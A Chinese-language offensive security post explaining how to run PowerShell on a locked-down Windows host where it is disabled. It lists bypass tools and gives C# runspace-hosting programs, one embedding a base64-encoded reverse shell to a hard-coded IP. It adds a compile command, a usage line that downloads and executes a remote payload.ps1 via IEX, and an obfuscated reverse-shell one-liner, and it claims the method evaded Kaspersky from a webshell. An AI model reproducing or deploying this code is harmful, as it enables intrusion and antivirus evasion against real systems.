一个面试题 低权限的用户,powershell被禁用,而且不能提权,但是就是想用powershell,怎么实现

工具

  1. 1PowerLine https://github.com/fullmetalcache/PowerLine)
  2. 2PowerShdll https://github.com/p3nt4/PowerShdll)
  3. 3Nopowershell https://github.com/bitsadmin/nopowershell.git)
  4. 4SyncAppvPublishingServerC:\Windows\System32\SyncAppvPublishingServer.vbs 以及      C:\Windows\System32\SyncAppvPublishingServer.exe
  5. 5、调用MSBuild.exe https://github.com/Cn33liz/MSBuildShell.git )
  6. 6、调用cscript https://github.com/tyranid/DotNetToJScript)

Csharp演示

通过代码直接调用System.Management,替代powershell.exe

  1. C:\Program Files (x86)\Reference Assemblies\Microsoft\WindowsPowerShell\3.0

image.png

理解版本

  1. using System;
  2. using System.Management.Automation.Runspaces;
  3. using System.Text;
  5. namespace nopowershell
  6. {
  7.     class Programe
  8.     {
  9.         static void Main(string[] args)
  10.         {
  11.             byte[] psrevshell = Convert.FromBase64String("U2V0LVZhcmlhYmxlIC1OYW1lIGNsaWVudCAtVmFsdWUgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5Tb2NrZXRzLlRDUENsaWVudCgiMTkyLjE2OC45Mi4xMjkiLDUzKSk7CiYoJ3NWJykgICgiezB9ezF9IiAtZiAncCcsJ3c0YycpICAoICBbdFlQRV0oInsxfXszfXsyfXswfSItZiAnbkcnLCdURScsKCJ7MX17Mn17MH0iIC1mICdpJywnRW4nLCdjT2QnKSwnWHQuJykgKSA7JigiezB9ezJ9ezF9ezN9IiAtZigiezB9ezF9IiAtZidTZXQnLCctJyksJ2InLCgiezF9ezB9Ii1mJ2FyaWEnLCdWJyksJ2xlJykgLVZhbHVlICgke0NgTGBJRW5UfS4oInsxfXsyfXswfSIgLWYgJ2FtJywoInswfXsxfSIgLWYnRycsJ2V0UycpLCd0cmUnKS4iaWBOYFZvS2UiKCkpIC1OYW1lICgiezB9ezF9ezJ9IiAtZiAncycsKCJ7MH17MX0iLWYndHInLCdlYScpLCdtJyk7W2J5dGVbXV0ke2JgWXRgZXN9ID0gMC4uNjU1MzV8JignJScpezB9O3doaWxlKCguKCJ7MH17Mn17M317MX0iIC1mJ1MnLCgiezB9ezF9IiAtZidpJywnYWJsZScpLCdldCcsKCJ7MH17MX0iIC1mICctJywnVmFyJykpIC1OYW1lICgnaScpIC1WYWx1ZSAoJHtzYFRgUmVhbX0uKCJ7MH17MX0iLWYnUmVhJywnZCcpLiJJTmBWb2tlIigke2JgWWBURVN9LCAwLCAke0J5YFRlc30uIkxlTmdgVEgiKSkpIC1uZSAwKXs7JigiezJ9ezB9ezF9IiAtZidWYScsKCJ7MH17MX0iLWYgJ3JpYScsJ2JsZScpLCgiezF9ezB9Ii1mICd0LScsJ1NlJykpIC1OYW1lICgiezF9ezB9Ii1mICd0YScsJ2RhJykgLVZhbHVlICgoJigiezJ9ezF9ezB9IiAtZiAnZWN0JywoInswfXsxfSItZid3LScsJ09iaicpLCdOZScpIC1UeXBlTmFtZSAoIns0fXsyfXsxfXswfXs1fXszfSIgLWYnSUVuJywnSScsKCJ7MX17MH17Mn0iIC1mJy4nLCd4dCcsJ0FTQycpLCgiezF9ezB9Ii1mICdkaW5nJywnbycpLCgiezF9ezJ9ezB9IiAtZidlJywnU3lzJywndGVtLlQnKSwnYycpKS4iZ2BlYFRTVFJpTmciKCR7YllUYEVzfSwwLCAke0l9KSk7LigiezF9ezJ9ezB9ezN9Ii1mJ2knLCdTZScsKCJ7MX17MH0iLWYncicsJ3QtVmEnKSwoInsxfXswfSIgLWYgJ2JsZScsJ2EnKSkgLVZhbHVlICguKCJ7MH17MX0iLWYnaWUnLCd4JykgJHtEYEFUQX0gMj4mMSB8IC4oInsxfXsyfXswfSItZidnJywnT3UnLCgiezB9ezF9Ii1mJ3QtU3RyaScsJ24nKSkgKSAtTmFtZSAoInswfXsxfSIgLWYgKCJ7MX17Mn17MH0iLWYgJ2MnLCdzZScsJ25kYmEnKSwnaycpOy4oInswfXszfXsxfXsyfSIgLWYnU2UnLCgiezB9ezF9Ii1mICdWYScsJ3JpYWJsJyksJ2UnLCd0LScpIC1WYWx1ZSAoJHtzRWBOREJhY2t9ICsgIlBTICIgKyAoLigiezB9ezF9IiAtZidwJywnd2QnKSkuIlBgQVRIIiArICI");
  12.             string decodedString = Encoding.UTF8.GetString(psrevshell);
  13.             Runspace rs = RunspaceFactory.CreateRunspace();
  14.             rs.Open();
  15.             Pipeline pipeline = rs.CreatePipeline();
  16.             pipeline.Commands.AddScript(decodedString);
  17.             pipeline.Invoke();
  18.             rs.Close();
  19.         }
  21.     }
  23. }

命令加强版本

  2. using System.Collections.ObjectModel;
  3. using System.Management.Automation;
  4. using System.Management.Automation.Runspaces;
  5. using System.IO;
  6. using System;
  7. using System.Text;
  8. namespace PSLess
  9. {
  10.     class PSLess
  11.     {
  12.         static void Main(string[] args)
  13.         {
  14.             if(args.Length ==0)
  15.                 Environment.Exit(1);
  16.             string temp = Base64Decode(args[0]);
  17.             string s=RunScript(temp);
  18.             Console.WriteLine(s);
  19.             Console.ReadKey();
  20.         }
  22.         public static string Base64Decode(string s)
  23.         {
  24.             return System.Text.Encoding.Default.GetString(System.Convert.FromBase64String(s));
  25.         }
  28.         private static string RunScript(string script)
  29.         {
  30.             Runspace MyRunspace = RunspaceFactory.CreateRunspace();
  31.             MyRunspace.Open();
  32.             Pipeline MyPipeline = MyRunspace.CreatePipeline();
  33.             MyPipeline.Commands.AddScript(script);
  34.             MyPipeline.Commands.Add("Out-String");
  35.             Collection<PSObject> outputs = MyPipeline.Invoke();
  36.             MyRunspace.Close();
  37.             StringBuilder sb = new StringBuilder();
  38.             foreach (PSObject pobject in outputs)
  39.             {
  40.                 sb.AppendLine(pobject.ToString());
  41.             }
  42.             return sb.ToString();
  43.         }
  44.     }
  45. }

编译

  1. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /reference:C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll /out:D:/power_base64.exe  d:\1.cs

使用

  1. Ping 127.0.0.1 -n 5 && cmd /c power_base64.exe "SUVYICgobmV3LW9iamVjdCBuZXQud2ViY2xpZW50KS5kb3dubG9hZHN0cmluZygnaHR0cDovLzE5Mi4xNjguNDMuMTAwLzEvcGF5bG9hZC5wczEnKSk="

Base64编码的内容为:IEX ((new-object net.webclient).downloadstring(‘http://192.168.43.100/1/payload.ps1’)))

image.png
powershell套接字

  1. Set-Variable -Name client -Value (New-Object System.Net.Sockets.TCPClient("192.168.92.129",53));
  2. &('sV')  ("{0}{1}" -f 'p','w4c')  (  [tYPE]("{1}{3}{2}{0}"-f 'nG','TE',("{1}{2}{0}" -f 'i','En','cOd'),'Xt.') ) ;&("{0}{2}{1}{3}" -f("{0}{1}" -f'Set','-'),'b',("{1}{0}"-f'aria','V'),'le') -Value (${C`L`IEnT}.("{1}{2}{0}" -f 'am',("{0}{1}" -f'G','etS'),'tre')."i`N`VoKe"()) -Name ("{0}{1}{2}" -f 's',("{0}{1}"-f'tr','ea'),'m');[byte[]]${b`Yt`es} = 0..65535|&('%'){0};while((.("{0}{2}{3}{1}" -f'S',("{0}{1}" -f'i','able'),'et',("{0}{1}" -f '-','Var')) -Name ('i') -Value (${s`T`Ream}.("{0}{1}"-f'Rea','d')."IN`Voke"(${b`Y`TES}, 0, ${By`Tes}."LeNg`TH"))) -ne 0){;&("{2}{0}{1}" -f'Va',("{0}{1}"-f 'ria','ble'),("{1}{0}"-f 't-','Se')) -Name ("{1}{0}"-f 'ta','da') -Value ((&("{2}{1}{0}" -f 'ect',("{0}{1}"-f'w-','Obj'),'Ne') -TypeName ("{4}{2}{1}{0}{5}{3}" -f'IEn','I',("{1}{0}{2}" -f'.','xt','ASC'),("{1}{0}"-f 'ding','o'),("{1}{2}{0}" -f'e','Sys','tem.T'),'c'))."g`e`TSTRiNg"(${bYT`Es},0, ${I}));.("{1}{2}{0}{3}"-f'i','Se',("{1}{0}"-f'r','t-Va'),("{1}{0}" -f 'ble','a')) -Value (.("{0}{1}"-f'ie','x') ${D`ATA} 2>&1 | .("{1}{2}{0}"-f'g','Ou',("{0}{1}"-f't-Stri','n')) ) -Name ("{0}{1}" -f ("{1}{2}{0}"-f 'c','se','ndba'),'k');.("{0}{3}{1}{2}" -f'Se',("{0}{1}"-f 'Va','riabl'),'e','t-') -Value (${sE`NDBack} + "PS " + (.("{0}{1}" -f'p','wd'))."P`ATH" + "> ") -Name ("{0}{1}"-f'se',("{0}{2}{1}"-f'n','ack2','db'));&("{1}{2}{3}{0}"-f 'le',("{0}{1}"-f 'Set-','Va'),'ri','ab') -Name ("{1}{0}"-f ("{0}{1}"-f'ndbyt','e'),'se') -Value (( (  .("{0}{1}" -f'i','tEm') ("{4}{2}{1}{0}{3}"-f'W4','Ble:p','IA','C','vaR')  )."vAL`UE"::"Asc`II").("{0}{1}" -f("{0}{1}"-f 'Get','By'),'tes')."in`VOKE"(${SEN`D`BAck2}));${str`eam}.("{0}{1}" -f'Wri','te')."InV`OKE"(${S`en`D`BYTE},0,${SeN`D`ByTe}."lE`NGtH");${ST`R`EaM}.("{0}{1}" -f ("{0}{1}"-f'F','lus'),'h')."IN`V`oKe"()};${cl`I`eNT}.("{0}{1}" -f'C',("{0}{1}"-f 'los','e'))."I`N`Voke"()

PowerShell调用问题.pdf

实战

image.png
目标存在卡巴斯基
当我们在webshell执行powershell命令的时候会被拦截
但用C#起到的nopowershell环境则可以收到请求

image.png
成功执行powershell函数